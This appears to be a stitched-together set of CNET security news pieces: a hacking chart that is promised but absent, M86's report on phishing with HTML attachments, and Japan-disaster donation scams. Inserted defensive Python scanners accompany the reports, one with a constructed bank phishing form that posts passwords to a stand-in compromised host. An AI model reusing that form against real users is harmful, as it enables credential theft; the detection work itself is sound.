The number of hacking events of late is making our heads spin at CNET.
By our count, there have been more than 40 computer attacks, network
intrusions, or data breaches in the last few months. And they seem to be
a daily occurrence.
In previous coverage we've noted that it seems to be open hacking season, written about some of the hackers and groups who are behind the attacks and speculated on their motives, so we thought we'd provide a chronological chart listing the attacks so we could all keep up on them. We plan to update the chart as time goes on. So please let us know if there are any additions or changes that should be made.
To get around phishing blacklists in browsers, scammers are luring people with HTML attachments instead of URLs, security firm M86 is warning. Browsers are good at detecting phishing sites and warning Web surfers via a browser notice when they are about to visit a site that looks dangerous. So good, in fact, that scammers are resorting to a new tactic to lure victims into their traps via e-mail: attaching HTML files that are saved and opened locally, so the phishing page itself never has a Web address for a blacklist to match, according to an M86 blog post yesterday.
After the user fills in the form with the information the scammers want to steal and clicks "submit," the HTML form sends the data through a POST request to a PHP (Hypertext Preprocessor) script hosted on a legitimate Web server that has been compromised. (POST is the HTTP method a browser uses to send form data to a Web server.) Because the address of that script is rarely reported as abusive, the submission does not trigger a warning from the browser, M86 said.
"Months-old phishing campaigns
remain undetected, so it seems this tactic is quite effective," the blog
post says. "Logically, however, the browser should be able to detect a
URL when the browser sends the POST request."
The collection URLs are also hard to verify on their own, without the HTML form: the PHP script runs on the server and displays no visible page after the victim clicks the submit button, other than redirecting to a page belonging to the company the scammer was impersonating, the post says.
To protect against this, people should avoid opening HTML attachments if the e-mail seems suspicious and should not enter any information into such forms. Financial institutions do not send such attachments to customers. While many people will click on a link in an e-mail that looks like it comes from their bank, fewer are likely to open an HTML attachment.
Mozilla representatives did not provide comment on the report today.
Meanwhile, a Google spokesperson provided this comment: "Google has a
number of defenses against phishing sites to help protect our users. For
example, Gmail checks HTML attachments for phishing sites and displays a
warning to users when one is detected. We always encourage users to be
cautious when handling unexpected attachments and when providing
personal information requested by email."
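Below is an added example of the kind of attachment check a mail gateway could run against this tactic (Google says above that Gmail does something along these lines); it is not M86's, Google's or any vendor's code. It parses the HTML, finds every form, and flags one that asks for credentials or account data and posts them to a host other than the brand the e-mail claims to come from, which is exactly the pattern M86 describes: the page is opened from disk, so the only URL the browser ever contacts is the POST target. The sample attachments, the brand and the supposedly compromised host are all constructed for the example and use reserved .example names.

```python
"""Heuristic scanner for HTML e-mail attachments used as phishing forms.

Added example; not M86's, Google's or any mail vendor's code. All domain
names and both sample attachments are constructed (reserved .example names).
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field-name tokens typical of credential- and payment-harvesting forms.
SENSITIVE_TOKENS = {"password", "passwd", "pass", "pwd", "pin", "ssn", "card",
                    "cardnumber", "cvv", "cvc", "account", "acct", "routing"}


class FormCollector(HTMLParser):
    """Collects each <form> with its action, method and <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = (a.get("name") or a.get("id") or "").lower()
            self._current["fields"].append((name, (a.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def is_sensitive(name, input_type):
    """True for password inputs or field names built from sensitive tokens."""
    if input_type == "password":
        return True
    tokens = set(re.split(r"[^a-z0-9]+", name))
    return bool(tokens & SENSITIVE_TOKENS)


def scan_attachment(html_text, brand_domains):
    """Return a list of (severity, message) findings for one attachment.

    brand_domains: domains of the organisation the e-mail purports to be from.
    A harvesting form is 'high' when it posts anywhere else, and still 'medium'
    when it posts to the brand, since banks do not send fill-in forms as attachments.
    """
    parser = FormCollector()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        sensitive = [n for n, t in form["fields"] if is_sensitive(n, t)]
        if not sensitive:
            continue
        host = (urlparse(form["action"]).hostname or "").lower()
        on_brand = any(host == d or host.endswith("." + d) for d in brand_domains)
        method = form["method"].upper()
        if host and not on_brand:
            findings.append(("high", f"form {method}s {sensitive} to third-party host {host}"))
        else:
            findings.append(("medium", f"attachment form collects {sensitive} "
                                       f"(action: {form['action'] or 'none'})"))
    return findings


# Constructed sample: a bank-branded form whose action is a PHP script on an
# unrelated host, standing in for the compromised server M86 describes.
SAMPLE_PHISH = """<html><body>
<img src="https://www.examplebank.example/logo.png">
<h2>Example Bank: confirm your account details</h2>
<form method="POST" action="https://gardening-club.example/images/verify.php">
  Account number <input name="account_number">
  Online password <input type="password" name="passwd">
  <input type="submit" value="Submit">
</form></body></html>"""

# Constructed benign sample: a statement page carrying only a search box.
SAMPLE_BENIGN = """<html><body><h2>Your statement</h2>
<form method="GET" action="https://www.examplebank.example/search">
  <input name="q"><input type="submit" value="Search">
</form></body></html>"""

if __name__ == "__main__":
    for label, doc in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(label, scan_attachment(doc, {"examplebank.example"}))
```

The brand list is the one piece of context the scanner needs that the attachment cannot supply: a gateway would derive it from the sending domain or the displayed brand, and anything that mismatches the POST target is the signal the browser never sees.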
In every disaster scammers see an opportunity, and the crisis in Japan is no exception. Already there have been fake Red Cross e-mails circulating, and there will no doubt be more scams coming. The e-mails appear to come from the British Red Cross. They provide some news on the earthquake and tsunami in Japan and urge people to donate through Moneybookers, a money transfer service that enables recipients to remain anonymous, to an account identified by a Yahoo e-mail address, according to AppRiver, an e-mail hosting and security services provider.
However, real charities have e-mail addresses with their own domain and
typically send people to their own Web site to make donations.
E-mails seeking "donations" via random payment services are just one way scammers exploit catastrophes. E-mails can also carry links or attachments that lead to phishing or malware-hosting Web sites. Scammers can also push malware-hosting sites into search results for popular search terms, and even create new topical Web sites solely for the purpose of hosting malware.
Here are tips for avoiding scams that piggyback on disasters and other high-profile events:
• Do not follow unsolicited Web links or attachments in e-mail
messages. Be particularly cautious about clicking on photos and videos
that purport to show dramatic images or footage of disasters as they can
be used as bait and lead to malware.
• Do not provide sensitive information, such as bank account information or Social Security number, in response to an e-mail.
• Keep your antivirus and other software up to date.
• Verify the legitimacy of the e-mail by going directly to the charity's Web site or calling the group.
• Find out details about the organization by searching on the Better Business Bureau's site or GuideStar. Attorneys general often have searchable databases of charitable groups in their states (California's attorney general, for example, maintains one). The U.S. Agency for International Development (USAID) also has valuable information about how best to help victims in international disasters.
• Be wary of sites that resemble legitimate organizations or that have copycat names similar to those of reputable organizations. For instance, most legitimate charitable organizations have a Web address that ends in ".org" instead of ".com," though anyone can register a ".org" name, so treat that as a weak signal rather than proof.
• Be skeptical of people claiming to be survivors and asking for donations via e-mail or social networks.
• Ask how much of the donation goes to charity and how much goes to administration.
• Use credit cards or checks; do not send cash. Do not make checks
payable to an individual. Only provide your credit card information once
you feel certain that the organization is credible and do not use money
payment services to make contributions.
• Do not feel pressured into giving donations.
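The sender and payment checks in the tips above can be mechanised. The following is an added example, not code from this article, AppRiver or any charity: it flags a sender on a free webmail domain rather than an organisation's own, a sender domain that copies a known charity (same name under ".com" instead of ".org", or a near-miss spelling), and a message that directs donations through a money transfer service without linking to the charity's own site. The charity registry, the charity names and all four messages are constructed placeholders for the example; the free-mail provider list is real but illustrative.

```python
"""Sender and payment checks for disaster-relief donation e-mail.

Added example; not from the article, AppRiver or any charity. The charity
registry and the sample messages are constructed for the example.
"""
import re

FREE_MAIL_DOMAINS = {"yahoo.com", "gmail.com", "hotmail.com", "aol.com"}
MONEY_TRANSFER_TERMS = ("moneybookers", "western union", "moneygram", "wire transfer")
# Constructed registry; a real deployment would load a curated charity list.
KNOWN_CHARITIES = {"example-relief.org", "example-aid.org"}


def levenshtein(a, b):
    """Edit distance, used to spot near-miss spellings of a charity's name."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def sender_domain(from_header):
    """Domain of the address in a From: header, with or without a display name."""
    m = re.search(r"<([^>]+)>", from_header)
    addr = m.group(1) if m else from_header.strip()
    return addr.rpartition("@")[2].lower()


def split_domain(domain):
    """(name, tld) from the last two labels: 'mail.example-relief.org' -> ('example-relief', 'org')."""
    parts = domain.split(".")
    return (parts[-2], parts[-1]) if len(parts) >= 2 else (domain, "")


def check_solicitation(from_header, body, known_charities=KNOWN_CHARITIES):
    """Return a list of findings; an empty list means nothing tripped."""
    findings = []
    dom = sender_domain(from_header)
    name, tld = split_domain(dom)
    if dom in FREE_MAIL_DOMAINS:
        findings.append(f"sender uses free webmail domain {dom}, not an organisation's own")
    for charity in known_charities:
        cname, ctld = split_domain(charity)
        if dom == charity or dom.endswith("." + charity):
            continue  # the charity itself or one of its own subdomains
        if name == cname and tld != ctld:
            findings.append(f"{dom} copies {charity} under a different top-level domain")
        elif 0 < levenshtein(name, cname) <= 2:
            findings.append(f"{dom} is a near-miss spelling of {charity}")
    low = body.lower()
    terms = [t for t in MONEY_TRANSFER_TERMS if t in low]
    if terms and not any(c in low for c in known_charities):
        findings.append(f"asks for payment via {terms} with no link to the charity's own site")
    return findings


# Constructed messages (none of these is a real e-mail): (From header, body).
SAMPLE_FREEMAIL = ("Example Relief <relief.donations@yahoo.com>",
                   "Please give to the victims of the Japan earthquake. Send your "
                   "donation via Moneybookers to relief.donations@yahoo.com.")
SAMPLE_COPYCAT = ("Example Relief <help@example-relief.com>",
                  "Donate now at http://example-relief.com/japan")
SAMPLE_TYPO = ("Example Relief <help@exampl-relief.org>",
               "Donate now at http://exampl-relief.org/japan")
SAMPLE_LEGIT = ("Example Relief <info@example-relief.org>",
                "Read our Japan update and donate at https://www.example-relief.org/japan")

if __name__ == "__main__":
    for label, (hdr, body) in (("freemail", SAMPLE_FREEMAIL), ("copycat", SAMPLE_COPYCAT),
                               ("typo", SAMPLE_TYPO), ("legit", SAMPLE_LEGIT)):
        print(label, check_solicitation(hdr, body))
```

None of these checks proves fraud on its own: a small charity might legitimately use webmail, and the edit-distance threshold of two will also catch unrelated short names. They are meant to decide which solicitations get verified by the slower route the tips recommend, going to the charity's own site or phoning it.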
Update 11:45 a.m. PT: GFI Labs blog
is reporting on Twitter spam with a link that leads to a brand new site
purporting to sell an electronic book on how to "minimize your chances
of [getting] radiation sickness." And Sophos reports
on malware circulating that poses as links to videos about the Japanese
tsunami, as well as dangerous links sent via Twitter notifications.
Update 2:42 p.m. PT: GFI Labs blog is reporting on e-mails from an "ICRC Basedhelping Foundation" that are seeking disaster donations. Kaspersky is also reporting on Japan quake-related e-mails with links that lead to pages with Java exploits designed to install malicious programs.
Update 4:42 p.m. PT: Sophos reported
over the weekend about a clickjacking attack in which Facebook users
were tricked into liking a YouTube video link that purported to show
video of a whale hitting a building during the tsunami in Japan.